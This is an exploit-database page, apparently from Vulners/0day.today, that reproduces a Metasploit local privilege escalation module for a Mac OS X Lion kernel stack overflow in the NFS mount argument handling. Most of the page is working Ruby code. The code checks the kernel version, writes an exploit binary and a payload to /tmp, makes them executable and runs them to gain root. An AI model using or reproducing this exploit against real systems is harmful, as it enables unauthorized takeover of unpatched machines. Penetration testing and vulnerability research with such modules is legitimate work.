Lucene search
K

Mac OS X NFS Mount Privilege Escalation Exploit

🗓️ 26 Apr 2014 00:00:00Reported by metasploitType 
zdt
 zdt
🔗 0day.today👁 17 Views

Mac OS X NFS Mount Privilege Escalation Exploit leveraging stack overflow vulnerability to escalate privileges in Mac OS X Lion Kernel. Affects xnu-1699.32.7 except xnu-1699.24.

Code
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Mac OS X NFS Mount Privilege Escalation Exploit',
      'Description'   => %q{
        This exploit leverage a stack overflow vulnerability to escalate privileges.
        The vulnerable function nfs_convert_old_nfs_args does not verify the size
        of a user-provided argument before copying it to the stack. As a result by
        passing a large size, a local user can overwrite the stack with arbitrary
        content.

        Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Kenzley Alphonse', # discovery and a very well-written exploit
          'joev' # msf module
        ],
      'References'    =>
        [
          [ 'EDB', '32813' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => [ ARCH_X86_64 ],
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.7 Lion x64 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X86_64
          }
        ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Apr 11 2014'
    ))
  end

  def check
    if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8"
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
    file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')
    exploit = File.read(file)
    pload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

    print_status "Writing temp file... #{tmpfile}"
    write_file(tmpfile, exploit)
    register_file_for_cleanup(tmpfile)

    print_status "Writing payload file... #{payloadfile}"
    write_file(payloadfile, pload)
    register_file_for_cleanup(payloadfile)

    print_status "Executing payload..."
    cmd_exec("chmod +x #{tmpfile}")
    cmd_exec("chmod +x #{payloadfile}")
    cmd_exec("#{tmpfile} #{payloadfile}")
  end

  def xnu_ver
    m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/)
    m && m[1]
  end

  def ver_lt(a, b)
    Gem::Version.new(a.gsub(/~.*?$/,'')) < Gem::Version.new(b.gsub(/~.*?$/,''))
  end

end

#  0day.today [2018-01-24]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation